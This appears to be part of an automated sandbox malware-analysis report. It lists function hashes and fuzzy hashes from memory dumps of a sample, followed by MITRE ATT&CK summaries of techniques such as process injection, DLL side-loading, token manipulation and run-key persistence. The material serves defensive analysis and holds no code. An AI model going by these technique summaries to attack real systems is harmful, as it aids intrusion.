Instruction ID: 25b08744babf19f7675ca749340e864a04608e1dd768769b588a08ceda0a4425
Opcode Fuzzy Hash: 437bc80a1f7a86d99dc436cee6e82983aa9deee15ba45306132afba67fc359b6
Instruction Fuzzy Hash: C4318035B402049FCB149F79D854BAE7BF6BB88610F548569D506D7391CF30AC52CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01346150 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6406fecb2eb74370b07c69e08703f9aef004db680e15402598f8c3d18b1ce085
Instruction ID: c85494970ceb4dc011bbb29edde1f870fe41e2ec459f73a9b9dd69705e5232de
Opcode Fuzzy Hash: 6406fecb2eb74370b07c69e08703f9aef004db680e15402598f8c3d18b1ce085
Instruction Fuzzy Hash: D3319034740209EFCB05AF69E855A6E3BB2FB89718F008429F90687351CB34DC62DF90

Uniqueness

Uniqueness Score: -1.00%

Function 01349990 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3470ed05d734553c913d4db7f9715aa3a61ddc403b8c7eaf64cfd7970079c737
Instruction ID: 524763738709360c8c63e9a674d9bc35448134579ae1c969d12b00497ca71228
Opcode Fuzzy Hash: 3470ed05d734553c913d4db7f9715aa3a61ddc403b8c7eaf64cfd7970079c737
Instruction Fuzzy Hash: A121ED323402114BFF16163AD858B7B2ADAAFC8A0CF188439D406CB795EE29DC83D781

Uniqueness

Uniqueness Score: -1.00%

Function 013471C7 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9ca59a1bdf7ed2e948acf312d7548acc044becac65ffeace3b0693c15c81a67
Instruction ID: 836bcb51fb6fde3efe1a928b8003573a0004cc75b3bc9721322abf88e7b97387
Opcode Fuzzy Hash: e9ca59a1bdf7ed2e948acf312d7548acc044becac65ffeace3b0693c15c81a67
Instruction Fuzzy Hash: AC2107347416118FD7299B6AD85892A7BE2FFC5659719847AE906CB350CF20EC42CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 0791CF40 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3572209513.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7910000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79a120b5ce8dc76821dd9e6a7c2795e46ecadc8e48db1260bea2f3be0609b917
Instruction ID: ba8532bf291221a7fb1061f537bd77eb46c36a71035ca0681f65fc09d7538022
Opcode Fuzzy Hash: 79a120b5ce8dc76821dd9e6a7c2795e46ecadc8e48db1260bea2f3be0609b917
Instruction Fuzzy Hash: 7C119071B151259BD704BBBEE88962EB7F9FB88A14F404929D48DD3340DE38DC06C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0119D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3556985457.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_119d000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7d98f9e9f999b4f9b274bcf183b3208ee54b74a3aa10b0b3f9a2bc80e85d611
Instruction ID: e201e309e2e98525161e0d15373673401e9baad9d83315d193cabfc2d2484ee4
Opcode Fuzzy Hash: d7d98f9e9f999b4f9b274bcf183b3208ee54b74a3aa10b0b3f9a2bc80e85d611
Instruction Fuzzy Hash: 40212271604200DFDF19DF68E984B26BFA5FB84354F28C66DD80A4B256C33AD447CA62

Uniqueness

Uniqueness Score: -1.00%

Function 0119D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3556985457.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_119d000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e33591fe5b83b5aaad2e4225fcda15d361743bd80472bb2cf6956cfc136f873
Instruction ID: c86d36bcd1ec1bb98f868ba0a332c815e1e3fc850ef78c1285864c728339cfe6
Opcode Fuzzy Hash: 5e33591fe5b83b5aaad2e4225fcda15d361743bd80472bb2cf6956cfc136f873
Instruction Fuzzy Hash: EC212971504200DFDF09DF98E6C0B26BBA5FB84324F20C5ADE9194B296C336D446CA62

Uniqueness

Uniqueness Score: -1.00%

Function 0134E090 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae0e8267e54b87edafe9f15e2b7884a16b3291182a8dc1077d533d8500a28fad
Instruction ID: 126e1e91b5bac4333b47466afc945048b04926ad9abc8a5fdbb478c56b29e043
Opcode Fuzzy Hash: ae0e8267e54b87edafe9f15e2b7884a16b3291182a8dc1077d533d8500a28fad
Instruction Fuzzy Hash: 5B21B631A1470687DB40AF6CC450396B371FFA9314F158234D95C7B346EBB1B8858790

Uniqueness

Uniqueness Score: -1.00%

Function 01346142 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c735941dafe9b27671e0ed1e3396263f77d709d2a8faf402d6f607ff8026c227
Instruction ID: d1fadfc4eb993a7afa99057e4d213a7b310173714db390a2acadfeb53a09b1f1
Opcode Fuzzy Hash: c735941dafe9b27671e0ed1e3396263f77d709d2a8faf402d6f607ff8026c227
Instruction Fuzzy Hash: 7521D571645209AFDB09AF69EC1575A3BA2FB85718F048029E9058B382CB34DC51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0134D83C Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ba6452996d5edc040b90b10b210f9f1e20937abb3f82e699a5183b02783a3de
Instruction ID: 03a81d2658b56c7c807f937fb1247fbba5626e56ba55cd522b10f0ff13d8b054
Opcode Fuzzy Hash: 8ba6452996d5edc040b90b10b210f9f1e20937abb3f82e699a5183b02783a3de
Instruction Fuzzy Hash: D2218031A1470A87EB40AFACC4503A6B362FFA8314F148635D9587B286EBB1B8858790

Uniqueness

Uniqueness Score: -1.00%

Function 0791CEEF Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3572209513.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7910000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c242306ea47b9b72a64719b41d4de3d626ddb5099e9a0c8ae2ed6eb781288236
Instruction ID: 5720a4a14c43a87c5ee93fcd2ccdcf3747cc1dc0cec9f9e1d8afd0ca7336e9a5
Opcode Fuzzy Hash: c242306ea47b9b72a64719b41d4de3d626ddb5099e9a0c8ae2ed6eb781288236
Instruction Fuzzy Hash: FF11C471B151258BC704BBBDE89926EBBF1FF88614F44096AD089D7340DE3C891AC792

Uniqueness

Uniqueness Score: -1.00%

Function 0134D7D0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 765923441bcfd1963594b18d80031813fce143f7d07166844992a676c0ad36af
Instruction ID: bce892750556b709c7d5dc617b9d9b323ec534f1dea97fd8f1ee6b83f46c7a4c
Opcode Fuzzy Hash: 765923441bcfd1963594b18d80031813fce143f7d07166844992a676c0ad36af
Instruction Fuzzy Hash: 201129312552A147EB00BF7CD8B07D6BFA0FFA5328F044276D48C5F296DAA19488C3D8

Uniqueness

Uniqueness Score: -1.00%

Function 0134B1C0 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef5e4fa25c931c9646712d61b1b0c289082492fb2df6edf7105c1961b2fcd8df
Instruction ID: 3eb4cdda6b59d4e2034e2f25e165e7aa7d59316939e29175efefbd7e98427e47
Opcode Fuzzy Hash: ef5e4fa25c931c9646712d61b1b0c289082492fb2df6edf7105c1961b2fcd8df
Instruction Fuzzy Hash: 8711B23164524A9FCB069F6CE854AAEBFF1BB49314F04802AF805C7366C730D962CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013445E8 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eef74c2e9ce31400a45b0544359228a822b5e92025af5558e5e4c99fc2507d1
Instruction ID: 13904badf7c6bef40b8ec37a1c8b948f0bf78a1131fdfbef613a4485d8a39515
Opcode Fuzzy Hash: 3eef74c2e9ce31400a45b0544359228a822b5e92025af5558e5e4c99fc2507d1
Instruction Fuzzy Hash: 4C112B36E405248BCF005B7AEC183AE77E6EFC8665F054434DA05D7355DF38A8528A91

Uniqueness

Uniqueness Score: -1.00%

Function 013445D8 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fda19898de90c5cdd6b21c6cc3607e6da508dcf907606f995ce26d0ad37e3af
Instruction ID: 0405047f77345b49dcb3783f80fc8f13dc5c978a05f0e6b52ae770212c0e2bc1
Opcode Fuzzy Hash: 4fda19898de90c5cdd6b21c6cc3607e6da508dcf907606f995ce26d0ad37e3af
Instruction Fuzzy Hash: DB116637E001158BCF114A7AAC043EAF7F6FBC0A69B194179C848D7244DB3898178EC5

Uniqueness

Uniqueness Score: -1.00%

Function 0134B1D0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75664f7212f7070bdc19f13cea84319742b1558b90346d35d27cc16d9bc652bf
Instruction ID: 8251c2ec714ada489d78625a4627c7a7e510dfe190c15c7f151374eb39578c99
Opcode Fuzzy Hash: 75664f7212f7070bdc19f13cea84319742b1558b90346d35d27cc16d9bc652bf
Instruction Fuzzy Hash: F0115E3160121A9FCB15AF6DE858A6EBBE5FB49314F004029FD15DB359CB34E961CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0134B2C8 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ea93b330212c46866e6cdbc107f422a06174b483a165e750c6d9bc8ad81cb4f
Instruction ID: eb1e11b9d7bf49b43d21e94ef8422427c9be0f7058f449a410612c61d2c2e0dd
Opcode Fuzzy Hash: 3ea93b330212c46866e6cdbc107f422a06174b483a165e750c6d9bc8ad81cb4f
Instruction Fuzzy Hash: 5F01B132B401156BDB159E5AD800BAF7BEBEBC9654F28C026F915D7384CB71DC229BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0119D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3556985457.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_119d000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 7f9eeb38d7468f6a61d30863a7613e10856ea0788d566ba7707ccb4ad8d83d7e
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 0C118B75504280DFDF16CF54D5C4B15BFA1FB84224F24C6AAD8494B696C33AD44ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0119D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3556985457.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_119d000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 6d49d46d96e98291ab71d5a70480b3c590aa48b8e22a8d6e14f665a78751b652
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 1E119D75504280DFDF16CF58E5C4B16FFA2FB84314F28C6AAD8494B656C33AD44ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 079195F1 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3572209513.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7910000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28c31e5b2bbaddd22c2c46322afac4e8c2528bb1a3b7904f74c0368a37b555ec
Instruction ID: 127777b044a2fab56fe8b18147978dd9e28c838ff16860c1850bf26b96a673fe
Opcode Fuzzy Hash: 28c31e5b2bbaddd22c2c46322afac4e8c2528bb1a3b7904f74c0368a37b555ec
Instruction Fuzzy Hash: 4AF0FF7012938A8FD71A1F70A82E1C23F21FE072E5385049BE449CA151CB38A506CB32

Uniqueness

Uniqueness Score: -1.00%

Function 0134D80C Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6a4a8a9a0d462312fb887720afb15bb06f6bffcfc72a84656ce69eba39243e1
Instruction ID: 6def83375486553bfa1383ea397128ec8e597fa0e789364dcb19a27e07ca4ab2
Opcode Fuzzy Hash: b6a4a8a9a0d462312fb887720afb15bb06f6bffcfc72a84656ce69eba39243e1
Instruction Fuzzy Hash: FAF0A43120420547EB107FAC9890B56B7A5FBA8324F104675E90DAB3C6DBB1684487A0

Uniqueness

Uniqueness Score: -1.00%

Function 0134DFD8 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3dc8f6f348291892017a2d26f3b60d66ae5303589831ecc9b9a5764414e784b
Instruction ID: a29818af8e835589caff076c5deec8eddb1fdff5bbc9053ebf4d791ea5ff8ea0
Opcode Fuzzy Hash: a3dc8f6f348291892017a2d26f3b60d66ae5303589831ecc9b9a5764414e784b
Instruction Fuzzy Hash: 1C01F93120834547EB116FACD860792BBA6FFA9328F0443B9D94C6F3C3DBB1684487A0

Uniqueness

Uniqueness Score: -1.00%

Function 01345670 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 929438383daedc4e2833d395b0c741625e563335bd2adf372778edae8763ee95
Instruction ID: 9c839c8b0f5932dd1c7ac8965d0dff60f18d3e6632811205510a2759c993841a
Opcode Fuzzy Hash: 929438383daedc4e2833d395b0c741625e563335bd2adf372778edae8763ee95
Instruction Fuzzy Hash: AEF0A775D002299BCB209AEDB8010DFFBF8EB44BB9B015032D414E7240E638A9518BE5

Uniqueness

Uniqueness Score: -1.00%

Function 07919631 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3572209513.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7910000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 138d069444cf76be9e0970853db4caeafaeb9e389e9a7c7f3666e084993db0e4
Instruction ID: 7e920d5e527c269656b42150188bf06da085e2bd7c12eecff596802b7d9c3205
Opcode Fuzzy Hash: 138d069444cf76be9e0970853db4caeafaeb9e389e9a7c7f3666e084993db0e4
Instruction Fuzzy Hash: D8E0127457564A8FD7181F70F51E1983F25FB063AA3500469F44AC5154CF75E441CA36

Uniqueness

Uniqueness Score: -1.00%

Function 0134DF98 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a353ca934fd35d20ddb0efeb8f2c1b03e81b7010bf4042031c36da10be241bf9
Instruction ID: 21e4600d0503a49b6e127c69885775fb4df2aca8dc47f1f8238ac2af6bb47dc3
Opcode Fuzzy Hash: a353ca934fd35d20ddb0efeb8f2c1b03e81b7010bf4042031c36da10be241bf9
Instruction Fuzzy Hash: 7BE0172135462623F54431ECA81177FAACF8BB8F29F20812AE65E9B6D6CCE66C4503D1

Uniqueness

Uniqueness Score: -1.00%

Function 0134A6E5 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9937e7ae20db927d12783ee2dcafe51b55a4a361c6dfb94f0ee89a8832e469dc
Instruction ID: e0bcf8503ef59dab9b245bc85c9e8b2f08f6620d9e3e74f421cd3339377891a6
Opcode Fuzzy Hash: 9937e7ae20db927d12783ee2dcafe51b55a4a361c6dfb94f0ee89a8832e469dc
Instruction Fuzzy Hash: F7D0673AB40018DFCB059F99E8408DDB7B6FB98221B548516E915A3261C631A961DB54

Uniqueness

Uniqueness Score: -1.00%

Function 01347611 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 908418fc39454883262ba04cab06e2521980687e6cbdc990082970e8c51a3e85
Instruction ID: cf8b14a6cc6973926e34e06c7a83d9fece084d6524c3ff9f435644abfa787384
Opcode Fuzzy Hash: 908418fc39454883262ba04cab06e2521980687e6cbdc990082970e8c51a3e85
Instruction Fuzzy Hash: C5D02E3008828D8FC302B339E8148CB3B29AB81304B408A3190099A32ACB60898A8B40

Uniqueness

Uniqueness Score: -1.00%

Function 0134BEA7 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25364c6681470fa7c74565d154af0ee10f32a975488c0835511098cccd56929c
Instruction ID: 56dd9bd93c474b128e14af5dcf7caa0cb1d896232be98c203d72cffa5ecfeeb1
Opcode Fuzzy Hash: 25364c6681470fa7c74565d154af0ee10f32a975488c0835511098cccd56929c
Instruction Fuzzy Hash: 2ED0C739F44108478B14A7B9A59419DB7E6B7C41357204C56C546D3748DA3094915791

Uniqueness

Uniqueness Score: -1.00%

Function 013445C1 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5afec92fd04e14fc0e8ffd5022ebd606a870ac9ce17feeba79cfbb304399a4bd
Instruction ID: 220e380597a9cf85f93d098ea6b4c29dc08b89d16fa4f39984fe72418fffccae
Opcode Fuzzy Hash: 5afec92fd04e14fc0e8ffd5022ebd606a870ac9ce17feeba79cfbb304399a4bd
Instruction Fuzzy Hash: 24C0126054A3C04FEF130660475414D6F70995319936A45E3D084C6163F245184F8393

Uniqueness

Uniqueness Score: -1.00%

Function 01349AA0 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbd81ca04214f50c74216173803e0aa7dd22421c9d3554fa9a35a273ad239353
Instruction ID: d952a2627e346b81be67ca108108fd315e7b66e66d30013c43f18cefdb2a451b
Opcode Fuzzy Hash: bbd81ca04214f50c74216173803e0aa7dd22421c9d3554fa9a35a273ad239353
Instruction Fuzzy Hash: F3C0121730E2C40ED3028AA828505D2EF74F55702530581F3C194C6513C1024819D721

Uniqueness

Uniqueness Score: -1.00%

Function 01347620 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a888e7f2629d2280a821fc119e56b4ac258d539f83d065a9dc5e94ccd8c62a9a
Instruction ID: 71155595f9000ff516ec077aa52a160e045ce152ded1cadb1313922d536b18f4
Opcode Fuzzy Hash: a888e7f2629d2280a821fc119e56b4ac258d539f83d065a9dc5e94ccd8c62a9a
Instruction Fuzzy Hash: FEC0123048460E8EC605F769F858599776EAB80704750D93090055633DDF7499C94A90

Uniqueness

Uniqueness Score: -1.00%

Function 0791FA88 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3572209513.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7910000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ba955c2276b8098663ad90883b03b1aa0a8dc6119650465bf4e6537a2b64b3c
Instruction ID: dca2c11dfd7e5ea2ec669643eda48fe9d11b75597cfb3a109aac1cd885140b5c
Opcode Fuzzy Hash: 1ba955c2276b8098663ad90883b03b1aa0a8dc6119650465bf4e6537a2b64b3c
Instruction Fuzzy Hash: 63D017709121198FCB84EFA4C99079DB7B2EB84304F0095A6800DA7224EB309B488F54

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

